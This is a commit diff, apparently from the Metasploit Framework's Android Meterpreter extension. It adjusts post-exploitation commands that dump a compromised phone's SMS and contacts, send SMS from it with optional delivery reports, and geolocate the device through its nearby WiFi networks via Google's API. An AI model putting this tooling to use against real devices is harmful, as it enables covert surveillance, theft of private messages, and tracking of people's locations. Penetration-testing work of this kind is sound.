bug fixes
parent
761caa0a60
commit
31dcae6828
|
@ -18,15 +18,14 @@ module Rex
|
||||||
attr_accessor :longitude
|
attr_accessor :longitude
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
@uri = URI.parse(GOOGLE_API_URI)
|
@uri = URI.parse(URI.encode(GOOGLE_API_URI))
|
||||||
@wlan_list = []
|
@wlan_list = []
|
||||||
end
|
end
|
||||||
|
|
||||||
# Ask Google's Maps API for the location of a given set of BSSIDs (MAC
|
# Ask Google's Maps API for the location of a given set of BSSIDs (MAC
|
||||||
# addresses of access points), ESSIDs (AP names), and signal strengths.
|
# addresses of access points), ESSIDs (AP names), and signal strengths.
|
||||||
def fetch!
|
def fetch!
|
||||||
@uri.query << @wlan_list.join("&")
|
@uri.query << @wlan_list.join("&wifi=")
|
||||||
|
|
||||||
request = Net::HTTP::Get.new(@uri.request_uri)
|
request = Net::HTTP::Get.new(@uri.request_uri)
|
||||||
http = Net::HTTP::new(@uri.host,@uri.port)
|
http = Net::HTTP::new(@uri.host,@uri.port)
|
||||||
http.use_ssl = true
|
http.use_ssl = true
|
||||||
|
@ -52,7 +51,7 @@ module Rex
|
||||||
# @param ssid [String] ESSID associated with the mac
|
# @param ssid [String] ESSID associated with the mac
|
||||||
# @param signal_strength [String] a thing like
|
# @param signal_strength [String] a thing like
|
||||||
def add_wlan(mac, ssid = nil, signal_strength = nil)
|
def add_wlan(mac, ssid = nil, signal_strength = nil)
|
||||||
@wlan_list.push("mac:#{mac.upcase}|ssid:#{ssid}|ss=#{signal_strength.to_i}")
|
@wlan_list.push(URI.encode("mac:#{mac.upcase}|ssid:#{ssid}|ss=#{signal_strength.to_i}"))
|
||||||
end
|
end
|
||||||
|
|
||||||
def google_maps_url
|
def google_maps_url
|
||||||
|
|
|
@ -44,7 +44,7 @@ class Android < Extension
|
||||||
def dump_sms
|
def dump_sms
|
||||||
sms = Array.new
|
sms = Array.new
|
||||||
request = Packet.create_request('dump_sms')
|
request = Packet.create_request('dump_sms')
|
||||||
response = client.send_request(request)
|
response = client.send_request(request,60)
|
||||||
|
|
||||||
response.each( TLV_TYPE_SMS_GROUP ) { |p|
|
response.each( TLV_TYPE_SMS_GROUP ) { |p|
|
||||||
|
|
||||||
|
@ -64,7 +64,7 @@ class Android < Extension
|
||||||
def dump_contacts
|
def dump_contacts
|
||||||
contacts = Array.new
|
contacts = Array.new
|
||||||
request = Packet.create_request('dump_contacts')
|
request = Packet.create_request('dump_contacts')
|
||||||
response = client.send_request(request)
|
response = client.send_request(request,60)
|
||||||
|
|
||||||
response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
|
response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
|
||||||
|
|
||||||
|
@ -120,18 +120,26 @@ class Android < Extension
|
||||||
response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
|
response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
|
||||||
end
|
end
|
||||||
|
|
||||||
def send_sms(dest,body)
|
def send_sms(dest,body,dr)
|
||||||
request = Packet.create_request('send_sms')
|
request = Packet.create_request('send_sms')
|
||||||
request.add_tlv(TLV_TYPE_SMS_ADDRESS,dest)
|
request.add_tlv(TLV_TYPE_SMS_ADDRESS,dest)
|
||||||
request.add_tlv(TLV_TYPE_SMS_BODY,body)
|
request.add_tlv(TLV_TYPE_SMS_BODY,body)
|
||||||
response = client.send_request(request)
|
request.add_tlv(TLV_TYPE_SMS_DR,dr)
|
||||||
resp=response.get_tlv(TLV_TYPE_SMS_SENT).value
|
if dr == false
|
||||||
return resp
|
response=client.send_request(request)
|
||||||
|
sr=response.get_tlv(TLV_TYPE_SMS_SR).value
|
||||||
|
return sr
|
||||||
|
else
|
||||||
|
response=client.send_request(request,30)
|
||||||
|
sr=response.get_tlv(TLV_TYPE_SMS_SR).value
|
||||||
|
dr=response.get_tlv(TLV_TYPE_SMS_SR).value
|
||||||
|
return [sr,dr]
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def wlan_geolocate
|
def wlan_geolocate
|
||||||
request = Packet.create_request('wlan_geolocate')
|
request = Packet.create_request('wlan_geolocate')
|
||||||
response = client.send_request(request,45)
|
response = client.send_request(request,60)
|
||||||
networks=[]
|
networks=[]
|
||||||
response.each( TLV_TYPE_WLAN_GROUP ) { |p|
|
response.each( TLV_TYPE_WLAN_GROUP ) { |p|
|
||||||
|
|
||||||
|
|
|
@ -33,13 +33,15 @@ TLV_TYPE_CHECK_ROOT_BOOL = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9019)
|
||||||
|
|
||||||
TLV_TYPE_SHUTDOWN_TIMER = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9020)
|
TLV_TYPE_SHUTDOWN_TIMER = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9020)
|
||||||
|
|
||||||
TLV_TYPE_SMS_SENT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9021)
|
TLV_TYPE_SMS_SR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9021)
|
||||||
|
|
||||||
TLV_TYPE_WLAN_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9022)
|
TLV_TYPE_WLAN_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9022)
|
||||||
TLV_TYPE_WLAN_BSSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9023)
|
TLV_TYPE_WLAN_BSSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9023)
|
||||||
TLV_TYPE_WLAN_SSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9024)
|
TLV_TYPE_WLAN_SSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9024)
|
||||||
TLV_TYPE_WLAN_LEVEL = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9025)
|
TLV_TYPE_WLAN_LEVEL = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9025)
|
||||||
|
|
||||||
|
TLV_TYPE_SMS_DR = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9026)
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -1,6 +1,7 @@
|
||||||
# -*- coding: binary -*-
|
# -*- coding: binary -*-
|
||||||
require 'rex/post/meterpreter'
|
require 'rex/post/meterpreter'
|
||||||
require 'msf/core/auxiliary/report'
|
require 'msf/core/auxiliary/report'
|
||||||
|
require 'rex/google_geolocation'
|
||||||
|
|
||||||
module Rex
|
module Rex
|
||||||
module Post
|
module Post
|
||||||
|
@ -377,10 +378,12 @@ class Console::CommandDispatcher::Android
|
||||||
send_sms_opts = Rex::Parser::Arguments.new(
|
send_sms_opts = Rex::Parser::Arguments.new(
|
||||||
'-h' => [ false, 'Help Banner' ],
|
'-h' => [ false, 'Help Banner' ],
|
||||||
'-d' => [ true, 'Destination number' ],
|
'-d' => [ true, 'Destination number' ],
|
||||||
'-t' => [ true, 'SMS body text' ]
|
'-t' => [ true, 'SMS body text' ],
|
||||||
|
'-dr' => [ false, 'Wait for delivery report' ]
|
||||||
)
|
)
|
||||||
dest=''
|
dest=''
|
||||||
body=''
|
body=''
|
||||||
|
dr=false
|
||||||
send_sms_opts.parse(args) { | opt, idx, val |
|
send_sms_opts.parse(args) { | opt, idx, val |
|
||||||
case opt
|
case opt
|
||||||
when '-h'
|
when '-h'
|
||||||
|
@ -392,6 +395,8 @@ class Console::CommandDispatcher::Android
|
||||||
dest=val
|
dest=val
|
||||||
when '-t'
|
when '-t'
|
||||||
body=val
|
body=val
|
||||||
|
when '-dr'
|
||||||
|
dr=true
|
||||||
end
|
end
|
||||||
}
|
}
|
||||||
if (dest.blank? or body.blank?)
|
if (dest.blank? or body.blank?)
|
||||||
|
@ -400,11 +405,25 @@ class Console::CommandDispatcher::Android
|
||||||
print_line(send_sms_opts.usage)
|
print_line(send_sms_opts.usage)
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
sent=client.android.send_sms(dest,body)
|
|
||||||
if (sent)
|
sent=client.android.send_sms(dest,body,dr)
|
||||||
print_good('SMS sent')
|
if (dr)
|
||||||
|
if (sent[0]=="Transmission successful")
|
||||||
|
print_good("SMS sent - #{sent[0]}")
|
||||||
else
|
else
|
||||||
print_status('SMS failed to send')
|
print_error("SMS send failed - #{sent[0]}")
|
||||||
|
end
|
||||||
|
if (sent[1]=="Transmission successful")
|
||||||
|
print_good("SMS delivered - #{sent[1]}")
|
||||||
|
else
|
||||||
|
print_error("SMS delivery failed - #{sent[1]}")
|
||||||
|
end
|
||||||
|
else
|
||||||
|
if (sent=="Transmission successful")
|
||||||
|
print_good("SMS sent - #{sent}")
|
||||||
|
else
|
||||||
|
print_error("SMS send failed - #{sent}")
|
||||||
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -422,42 +441,36 @@ class Console::CommandDispatcher::Android
|
||||||
print_line(wlan_geolocate_opts.usage)
|
print_line(wlan_geolocate_opts.usage)
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
}
|
||||||
|
|
||||||
print_status('Waiting for WiFi scan results...')
|
|
||||||
log = client.android.wlan_geolocate
|
log = client.android.wlan_geolocate
|
||||||
wlan_list=''
|
wlan_list=[]
|
||||||
|
wlan_str=""
|
||||||
log.each{|x|
|
log.each{|x|
|
||||||
mac=x['bssid']
|
mac=x['bssid']
|
||||||
ssid=x['ssid']
|
ssid=x['ssid']
|
||||||
ss=x['level']
|
ss=x['level']
|
||||||
network_data = "&wifi=mac:#{mac}|ssid:#{ssid}|ss=#{ss}"
|
wlan_list << [mac,ssid,ss.to_s]
|
||||||
wlan_list << network_data
|
|
||||||
}
|
}
|
||||||
|
|
||||||
if wlan_list.blank?
|
if wlan_list.blank?
|
||||||
print_error("Unable to enumerate wireless networks from the target. Wireless may not be present or enabled.")
|
print_error("Unable to enumerate wireless networks from the target. Wireless may not be present or enabled.")
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
g = Rex::GoogleGeolocation.new
|
||||||
|
|
||||||
# Build and send the request to Google
|
wlan_list.each do |wlan|
|
||||||
url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}"
|
g.add_wlan(*wlan)
|
||||||
uri = URI.parse(URI.encode(url))
|
|
||||||
request = Net::HTTP::Get.new(uri.request_uri)
|
|
||||||
http = Net::HTTP::new(uri.host,uri.port)
|
|
||||||
http.use_ssl = true
|
|
||||||
response = http.request(request)
|
|
||||||
|
|
||||||
# Gather the required information from the response
|
|
||||||
if response && response.code == '200'
|
|
||||||
results = JSON.parse(response.body)
|
|
||||||
latitude = results["location"]["lat"]
|
|
||||||
longitude = results["location"]["lng"]
|
|
||||||
accuracy = results["accuracy"]
|
|
||||||
print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.")
|
|
||||||
print_status("Google Maps URL: https://maps.google.com/?q=#{latitude},#{longitude}")
|
|
||||||
else
|
|
||||||
print_error("Failure connecting to Google for location lookup.")
|
|
||||||
end
|
end
|
||||||
|
begin
|
||||||
|
g.fetch!
|
||||||
|
rescue RuntimeError => e
|
||||||
|
print_error("Error: #{e}")
|
||||||
|
else
|
||||||
|
print_status(g.to_s)
|
||||||
|
print_status("Google Maps URL: #{g.google_maps_url}")
|
||||||
|
end
|
||||||
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue